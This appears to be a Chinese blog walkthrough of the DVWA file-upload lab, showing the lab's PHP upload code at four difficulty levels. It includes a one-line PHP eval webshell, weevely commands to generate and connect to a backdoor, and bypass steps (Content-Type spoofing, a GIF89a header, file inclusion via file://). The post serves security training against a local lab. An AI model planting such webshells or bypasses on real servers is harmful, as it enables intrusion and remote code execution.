zoukankan      html  css  js  c++  java
  • 文件上传

    文件上传

    weevely使用方法

    终端敲下:

    产生木马文件

    weevely generate hacker ~/hacker.php

    连上后台

    weevely http://127.0.0.1/dvwa/hackable/uploads/hacker.php hacker

    low

    <?php
    
    if( isset( $_POST[ 'Upload' ] ) ) {
    
    	// Where are we going to be writing to?
    
    	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    
    	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
    	// Can we move the file to the upload folder?
    
    	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    
    		// No
    
    		$html .= '<pre>Your image was not uploaded.</pre>';
    
    	}
    
    	else {
    
    		// Yes!
    
    		$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    
    	}
    
    }
    
    ?>
    

    审计代码,可以发现没有对上传的文件进行任何的检查,我们直接上传木马文件即可getshell

    medium

    <?php
    
    if( isset( $_POST[ 'Upload' ] ) ) {
    
    	// Where are we going to be writing to?
    
    	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    
    	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
    	// File information
    
    	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    
    	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    
    	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    
    	// Is it an image?
    
    	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    
    		( $uploaded_size < 100000 ) ) {
    
    		// Can we move the file to the upload folder?
    
    		if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    
    			// No
    
    			$html .= '<pre>Your image was not uploaded.</pre>';
    
    		}
    
    		else {
    
    			// Yes!
    
    			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    
    		}
    
    	}
    
    	else {
    
    		// Invalid file
    
    		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    
    	}
    
    }
    
    ?>
    

    审计代码,只对content-type进行了验证,我们只需将其改为image/png即可绕过

    high

    <?php
      
    if( isset( $_POST[ 'Upload' ] ) ) {
    
    	// Where are we going to be writing to?
    
    	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    
    	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
    	// File information
    
    	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    
    	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    
    	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    
    	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    
    	// Is it an image?
    
    	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
    
    		( $uploaded_size < 100000 ) &&
    
    		getimagesize( $uploaded_tmp ) ) {
    
    		// Can we move the file to the upload folder?
    
    		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
    
    			// No
    
    			$html .= '<pre>Your image was not uploaded.</pre>';
    
    		}
    
    		else {
    
    			// Yes!
    
    			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    
    		}
    
    	}
    
    	else {
    
    		// Invalid file
    
    		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    
    	}
    
    }
    
    ?>
    

    要求后缀是.png或.jpg或.jpeg,并且对大小进行了限制,检查了文件头,我们可以在文件头前加个GIF89a?来绕过文件头检查,但是要绕过后缀限制,我们这时就要结合文件包含漏洞

    写个一句话木马

    <?php @eval($_POST['shell']); ?>
    

    将其抓包,改包,后缀改成.png,然后在利用文件包含漏洞页面high级别的file协议,

    http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///var/www/html/dvwa/hackable/uploads/shell.png

    在[POST:DATA]

    shell=system('ls');

    impossible

    <?php
      
    if( isset( $_POST[ 'Upload' ] ) ) {
    
    	// Where are we going to be writing to?
    
    	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    
    	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
    	// File information
    
    	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    
    	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    
    	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    
    	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    
    	// Is it an image?
    
    	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
    
    		( $uploaded_size < 100000 ) &&
    
    		getimagesize( $uploaded_tmp ) ) {
    
    
    
    		// Can we move the file to the upload folder?
    
    		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
    
    			// No
    
    			$html .= '<pre>Your image was not uploaded.</pre>';
    
    		}
    
    		else {
    
    			// Yes!
    
    			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    
    		}
    
    	}
    
    	else {
    
    		// Invalid file
    
    		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    
    	}
    
    }
    
    ?>
    

    对文件进行了重命名,白名单限制了后缀,文件头检查,等等,无法实现绕过

  • 相关阅读:
    剩余的div自动填满height calc
    防抖
    autocomplete失效
    子组件上下结构布局自适应父组件宽度高度
    glup打包代码不更新
    手写弹出框,设置遮罩,布局设计。
    css设置背景透明度
    vue项目中z-index不起作用(将vue实例挂在到window上面)
    odoo官方文档第十二章 Javascript Reference
    odoo官方文档第十一章 Javascript Cheatsheet
  • 原文地址:https://www.cnblogs.com/NineOne/p/13757852.html
Copyright © 2011-2022 走看看